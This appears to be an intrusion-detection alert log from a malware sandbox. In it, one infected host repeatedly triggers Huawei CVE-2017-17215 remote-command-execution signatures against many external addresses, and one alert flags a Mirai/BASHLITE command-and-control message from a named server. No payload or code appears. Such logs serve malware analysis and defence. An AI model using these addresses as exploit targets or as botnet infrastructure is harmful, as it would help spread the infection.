                                            06/14/24-10:44:26.978307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3615837215192.168.2.14197.203.176.20
                                            06/14/24-10:44:14.671561TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207837215192.168.2.14197.66.14.179
                                            06/14/24-10:43:48.020649TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4600237215192.168.2.1441.145.182.29
                                            06/14/24-10:44:29.014690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3317437215192.168.2.14156.0.188.14
                                            06/14/24-10:44:12.617562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005637215192.168.2.1441.91.148.111
                                            06/14/24-10:43:52.164194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4420037215192.168.2.14156.93.56.30
                                            06/14/24-10:43:36.701233TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4681637215192.168.2.14197.44.112.156
                                            06/14/24-10:43:58.274062TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4424837215192.168.2.14197.125.188.143
                                            06/14/24-10:43:52.160327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5262437215192.168.2.14156.135.186.34
                                            06/14/24-10:44:04.405726TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949237215192.168.2.14156.39.215.149
                                            06/14/24-10:44:24.942353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3353637215192.168.2.14197.1.109.7
                                            06/14/24-10:44:26.998010TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340037215192.168.2.14197.63.238.222
                                            06/14/24-10:43:37.759000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5948837215192.168.2.14156.226.51.240
                                            06/14/24-10:43:48.019316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006637215192.168.2.14197.140.111.133
                                            06/14/24-10:43:36.703055TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3842437215192.168.2.14156.31.90.73
                                            06/14/24-10:44:18.778378TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.14197.239.17.254
                                            06/14/24-10:43:48.017154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4753037215192.168.2.14197.159.197.11
                                            06/14/24-10:43:37.759409TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925637215192.168.2.14197.205.109.92
                                            06/14/24-10:44:12.616807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3729037215192.168.2.1441.15.233.67
                                            06/14/24-10:43:54.186589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4634637215192.168.2.14156.79.222.154
                                            06/14/24-10:43:43.944747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284237215192.168.2.14156.43.37.91
                                            06/14/24-10:43:48.016573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3484837215192.168.2.1441.237.104.173
                                            06/14/24-10:44:20.829140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4724837215192.168.2.1441.121.87.144
                                            06/14/24-10:44:10.548414TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5098037215192.168.2.14156.244.170.187
                                            06/14/24-10:44:12.640622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4381037215192.168.2.14197.241.91.197
                                            06/14/24-10:43:43.943995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4383237215192.168.2.14197.204.126.204
                                            06/14/24-10:44:12.617653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4699237215192.168.2.14156.58.214.77
                                            06/14/24-10:43:39.811652TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810037215192.168.2.14197.140.248.199
                                            06/14/24-10:43:43.944188TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4102437215192.168.2.1441.120.147.232
                                            06/14/24-10:44:33.149130TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3321037215192.168.2.14197.80.144.165
                                            06/14/24-10:44:18.775951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598037215192.168.2.1441.201.37.15
                                            06/14/24-10:43:34.679066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4139037215192.168.2.14197.42.14.45
                                            06/14/24-10:44:35.179937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5699237215192.168.2.14156.159.43.45
                                            06/14/24-10:43:50.073212TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4763437215192.168.2.14156.19.121.6
                                            06/14/24-10:43:50.074427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6014637215192.168.2.14156.227.111.16
                                            06/14/24-10:43:41.909302TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5163837215192.168.2.1441.95.238.20
                                            06/14/24-10:44:14.682259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3633437215192.168.2.14156.146.90.116
                                            06/14/24-10:43:43.940848TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4517237215192.168.2.14156.55.69.224
                                            06/14/24-10:43:52.149141TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4779637215192.168.2.1441.17.89.112
                                            06/14/24-10:43:52.145875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5844437215192.168.2.14156.44.226.203
                                            06/14/24-10:44:12.643666TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677437215192.168.2.14197.45.26.154
                                            06/14/24-10:43:54.202916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566237215192.168.2.14197.102.191.111
                                            06/14/24-10:43:48.034276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3554037215192.168.2.14156.154.223.49
                                            06/14/24-10:44:06.450011TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853637215192.168.2.1441.216.22.171
                                            06/14/24-10:44:24.913282TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644237215192.168.2.1441.117.91.71
                                            06/14/24-10:43:39.792686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060037215192.168.2.1441.117.237.90
                                            06/14/24-10:43:48.032201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617437215192.168.2.14197.77.148.172
                                            06/14/24-10:43:39.790344TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5441837215192.168.2.14156.120.33.84
                                            06/14/24-10:44:14.683290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3961037215192.168.2.1441.197.70.196
                                            06/14/24-10:44:14.682950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3568237215192.168.2.14156.6.243.6
                                            06/14/24-10:44:16.716153TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4581437215192.168.2.14197.55.225.26
                                            06/14/24-10:43:34.663470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872037215192.168.2.14156.63.123.182
                                            06/14/24-10:44:02.383559TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4192037215192.168.2.1441.115.4.218
                                            06/14/24-10:44:29.022842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599837215192.168.2.14197.236.84.254
                                            06/14/24-10:44:24.916049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5504637215192.168.2.14197.43.248.19
                                            06/14/24-10:44:22.881746TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4112837215192.168.2.14156.18.56.106
                                            06/14/24-10:44:08.504712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788437215192.168.2.14156.57.222.145
                                            06/14/24-10:43:34.663579TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507437215192.168.2.1441.103.79.200
                                            06/14/24-10:43:43.942415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4197037215192.168.2.14156.218.70.230
                                            06/14/24-10:44:06.452038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5570837215192.168.2.1441.21.217.185
                                            06/14/24-10:43:56.228225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4615037215192.168.2.14156.33.206.26
                                            06/14/24-10:44:31.055878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308837215192.168.2.14197.211.19.84
                                            06/14/24-10:44:00.325015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5890837215192.168.2.14156.110.22.220
                                            06/14/24-10:43:39.790640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934437215192.168.2.14156.143.59.57
                                            06/14/24-10:43:45.991113TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5853837215192.168.2.14156.251.87.234
                                            06/14/24-10:43:36.703677TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439637215192.168.2.1441.247.182.165
                                            06/14/24-10:43:34.661180TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5252637215192.168.2.1441.174.190.39
                                            06/14/24-10:44:18.778239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352837215192.168.2.14156.96.111.46
                                            06/14/24-10:44:06.453667TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5216837215192.168.2.1441.246.230.44
                                            06/14/24-10:44:06.470308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238637215192.168.2.1441.93.199.206
                                            06/14/24-10:43:34.679393TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388037215192.168.2.14156.128.98.241
                                            06/14/24-10:44:04.408232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3949637215192.168.2.14156.123.132.2
                                            06/14/24-10:44:14.670512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528437215192.168.2.1441.22.137.167
                                            06/14/24-10:44:29.024022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5269037215192.168.2.14156.33.246.221
                                            06/14/24-10:44:24.916105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259637215192.168.2.1441.50.30.60
                                            06/14/24-10:44:20.803728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4402637215192.168.2.14197.241.213.212
                                            06/14/24-10:44:08.503908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4733637215192.168.2.14197.255.197.153
                                            06/14/24-10:43:36.701201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5255437215192.168.2.14197.240.208.72
                                            06/14/24-10:44:29.015018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869437215192.168.2.14197.21.101.151
                                            06/14/24-10:44:00.341576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5034237215192.168.2.1441.167.25.16
                                            06/14/24-10:44:08.520730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4169037215192.168.2.14156.223.187.67
                                            06/14/24-10:43:58.289191TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5503837215192.168.2.14197.229.208.43
                                            06/14/24-10:43:43.942482TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126637215192.168.2.14156.55.148.73
                                            06/14/24-10:44:16.735463TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196837215192.168.2.14197.43.10.0
                                            06/14/24-10:44:16.718592TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6082437215192.168.2.14197.243.168.82
                                            06/14/24-10:44:16.718979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607037215192.168.2.14156.102.104.231
                                            06/14/24-10:44:04.411853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3558837215192.168.2.1441.173.56.153
                                            06/14/24-10:43:34.678162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5664837215192.168.2.1441.23.70.120
                                            06/14/24-10:43:54.184472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177637215192.168.2.1441.68.36.93
                                            06/14/24-10:44:20.804095TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4200437215192.168.2.1441.126.165.103
                                            06/14/24-10:43:54.198516TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4147837215192.168.2.14197.237.228.133
                                            06/14/24-10:43:52.148925TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4708837215192.168.2.14156.5.163.238
                                            06/14/24-10:43:58.291116TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5416437215192.168.2.14197.236.68.3
                                            06/14/24-10:44:02.368237TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4486037215192.168.2.14156.50.12.194
                                            06/14/24-10:44:08.505002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4195637215192.168.2.14156.86.224.30
                                            06/14/24-10:44:24.932878TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4831437215192.168.2.1441.82.198.31
                                            06/14/24-10:44:00.338143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5434437215192.168.2.14156.185.244.202
                                            06/14/24-10:43:50.072740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3967837215192.168.2.14197.93.107.155
                                            06/14/24-10:44:12.642892TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6060037215192.168.2.14156.249.10.181
                                            06/14/24-10:44:11.295539TCP2840516ETPRO TROJAN ELF/BASHLITE/Mirai Cayosin Variant CnC Server Message233872243.231.232.101192.168.2.14
                                            06/14/24-10:44:18.776694TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862637215192.168.2.1441.74.249.53
                                            06/14/24-10:44:14.669919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614437215192.168.2.14156.36.47.47
                                            06/14/24-10:44:04.412368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458037215192.168.2.1441.249.75.18
                                            06/14/24-10:44:26.980305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4509437215192.168.2.14197.215.245.175
                                            06/14/24-10:43:48.029213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777237215192.168.2.14156.147.66.25
                                            06/14/24-10:44:29.027273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056037215192.168.2.14156.105.194.91
                                            06/14/24-10:44:33.132755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4923437215192.168.2.1441.68.123.216
                                            06/14/24-10:44:16.732941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3477437215192.168.2.1441.93.56.229
                                            06/14/24-10:44:35.181853TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4434637215192.168.2.1441.141.111.154
                                            06/14/24-10:43:43.971924TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428437215192.168.2.1441.117.176.147
                                            06/14/24-10:43:54.184883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5057237215192.168.2.14197.132.225.46
                                            06/14/24-10:44:18.777260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5284037215192.168.2.14156.167.130.218
                                            06/14/24-10:44:00.322983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150037215192.168.2.14156.219.97.18
                                            06/14/24-10:44:06.471269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890237215192.168.2.14197.169.51.90
                                            06/14/24-10:44:06.453903TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3387837215192.168.2.1441.125.228.170
                                            06/14/24-10:44:06.471653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3399637215192.168.2.14197.201.201.165
                                            06/14/24-10:43:52.160684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5950837215192.168.2.14156.230.168.99
                                            06/14/24-10:44:26.979466TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4991237215192.168.2.14156.132.183.4
                                            06/14/24-10:44:10.564099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3842637215192.168.2.14197.228.148.240
                                            06/14/24-10:44:10.569321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5827437215192.168.2.14156.60.109.235
                                            06/14/24-10:44:29.024728TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3739837215192.168.2.14156.199.100.48
                                            06/14/24-10:44:29.011030TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4927037215192.168.2.14197.176.208.236
                                            06/14/24-10:44:26.979759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4163037215192.168.2.14156.205.214.239
                                            06/14/24-10:44:02.367670TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016237215192.168.2.1441.1.209.178
                                            06/14/24-10:44:20.829057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585237215192.168.2.14197.15.153.214
                                            06/14/24-10:44:06.451860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980037215192.168.2.14156.36.5.170
                                            06/14/24-10:43:54.202148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3691437215192.168.2.14156.112.103.139
                                            06/14/24-10:44:18.761778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3750437215192.168.2.1441.230.137.134
                                            06/14/24-10:43:41.847803TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093237215192.168.2.1441.201.211.176
                                            06/14/24-10:44:08.503821TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4610437215192.168.2.14156.132.126.171
                                            06/14/24-10:44:10.548284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3633237215192.168.2.14197.169.124.227
                                            06/14/24-10:44:16.717410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763637215192.168.2.14156.32.208.10
                                            06/14/24-10:44:18.762848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334837215192.168.2.1441.182.148.60
                                            06/14/24-10:43:45.989009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018837215192.168.2.14197.54.200.150
                                            06/14/24-10:44:14.689131TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751037215192.168.2.1441.14.84.255
                                            06/14/24-10:44:12.616147TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4408237215192.168.2.1441.147.179.15
                                            06/14/24-10:44:04.425058TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3566437215192.168.2.14156.33.234.229
                                            06/14/24-10:44:10.564939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5740237215192.168.2.14156.158.17.164
                                            06/14/24-10:43:41.848287TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4660037215192.168.2.14197.108.169.253
                                            06/14/24-10:44:33.148309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5266637215192.168.2.14156.131.253.106
                                            06/14/24-10:43:45.966600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4531837215192.168.2.1441.77.103.144
                                            06/14/24-10:44:26.978893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548837215192.168.2.14156.195.49.197
                                            06/14/24-10:43:43.941570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5547037215192.168.2.14156.252.85.75
                                            06/14/24-10:44:33.151299TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3472237215192.168.2.14197.137.176.75
                                            06/14/24-10:44:20.806496TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5026837215192.168.2.14156.75.61.12
                                            06/14/24-10:43:56.224581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5265237215192.168.2.14156.26.59.244
                                            06/14/24-10:44:06.453460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4074437215192.168.2.14156.211.97.18
                                            06/14/24-10:44:00.322900TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4312837215192.168.2.1441.53.24.80
                                            06/14/24-10:44:31.053763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5343437215192.168.2.14197.156.33.239
                                            06/14/24-10:43:48.017256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3626637215192.168.2.14197.184.114.116
                                            06/14/24-10:44:35.181569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5748437215192.168.2.14156.105.33.216
                                            06/14/24-10:44:02.369389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3986837215192.168.2.1441.57.38.222
                                            06/14/24-10:43:34.677365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4091837215192.168.2.1441.45.227.75
                                            06/14/24-10:44:00.340764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328237215192.168.2.14156.131.89.212
                                            06/14/24-10:43:52.165358TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4393837215192.168.2.14156.217.17.57
                                            06/14/24-10:44:08.517398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287237215192.168.2.1441.112.44.229
                                            06/14/24-10:44:31.053895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4564237215192.168.2.14197.215.200.232
                                            06/14/24-10:43:54.183983TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4617037215192.168.2.14197.132.130.128
                                            06/14/24-10:43:48.015750TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060637215192.168.2.14156.188.95.136
                                            06/14/24-10:43:36.703727TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713437215192.168.2.14156.236.153.67
                                            06/14/24-10:43:58.277887TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5574637215192.168.2.14156.125.86.225
                                            06/14/24-10:43:39.810493TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3719037215192.168.2.1441.165.173.93
                                            06/14/24-10:44:00.321698TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4123637215192.168.2.1441.43.16.94
                                            06/14/24-10:43:54.181765TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4566237215192.168.2.14156.234.26.120
                                            06/14/24-10:44:22.879079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5707837215192.168.2.14156.206.143.249
                                            06/14/24-10:43:43.943708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3419037215192.168.2.1441.37.190.182
                                            06/14/24-10:44:22.861461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4563237215192.168.2.14156.76.176.205
                                            06/14/24-10:43:41.849164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278237215192.168.2.14197.132.132.236
                                            06/14/24-10:44:08.503381TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5311637215192.168.2.1441.238.53.32
                                            06/14/24-10:43:52.161389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3911437215192.168.2.1441.14.22.24
                                            06/14/24-10:43:56.242608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690037215192.168.2.14156.151.77.232
                                            06/14/24-10:43:39.791490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3315237215192.168.2.1441.232.239.102
                                            06/14/24-10:43:58.294955TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844837215192.168.2.14156.108.102.247
                                            06/14/24-10:44:31.093082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5247037215192.168.2.1441.153.123.96
                                            06/14/24-10:43:37.761560TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4311237215192.168.2.14156.214.144.66
                                            06/14/24-10:43:54.184859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4302437215192.168.2.14197.45.36.99
                                            06/14/24-10:43:56.242572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3530037215192.168.2.1441.17.196.149
                                            06/14/24-10:43:50.072932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4549437215192.168.2.14156.215.120.18
                                            06/14/24-10:44:20.807678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905437215192.168.2.1441.223.240.199
                                            06/14/24-10:43:45.967653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3364037215192.168.2.14197.117.174.235
                                            06/14/24-10:43:45.985111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4523237215192.168.2.14156.254.173.188
                                            06/14/24-10:44:10.566614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4337837215192.168.2.14197.228.180.3
                                            06/14/24-10:43:41.850331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4768237215192.168.2.14197.55.190.177
                                            06/14/24-10:44:29.014724TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5213637215192.168.2.14156.164.146.140
                                            06/14/24-10:43:41.849012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4385237215192.168.2.1441.149.178.213
                                            06/14/24-10:44:22.861256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591837215192.168.2.1441.114.248.66
                                            06/14/24-10:44:06.452919TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3491437215192.168.2.1441.153.122.1
